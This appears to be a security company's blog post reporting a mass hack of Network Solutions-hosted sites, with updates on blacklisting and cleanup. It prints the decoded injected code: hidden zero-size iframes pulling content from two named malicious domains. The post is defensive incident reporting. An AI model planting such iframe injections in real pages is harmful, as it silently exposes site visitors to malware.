0 SHARES Facebook Twitter

Network Solutions is getting hacked again. Just today we were notified of more than 50 sites hacked with the following malware javascript:



If we decode this javascript, we see that it is injecting this iframe from http://corpadsinc.com/grep/ :

document.write (s) < iframe frameborder="0" onload=' if (!this.src){ this.src="http://corpadsinc.com/grep/"; this.height=0; this.width=0;} '

Note that this time we are seeing all kind of sites hacked. From WordPress, Joomla to just simple HTML sites.

UPDATE 1: Google is already blacklisting lots of them… Bad day to be a Network Solutions customer.

UPDATE 2: Some sites are also compromised with this encoded javascript:



Which injects an iframe from that http://mainnetsoll.com/grep/ domain (same from the attack of last week)

iframe frameborder=”0″ onload=’ if (!this.src){ this.src=”http://mainnetsoll.com/grep/”; this.height=0; this.width=0;} ‘

UPDATE 3: Some WordPress sites we were analyzing only had the malware inserted at the cache file from WP-Super-Cache. Everything else was clean.

UPDATE 4: Post from http://stopmalvertising.com explaining their finds on this issue.

UPDATE 5: Network solutions updated their blog apologizing to their clients and saying that they are working hard to fix it. Hopefully it will be solved soon.

As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.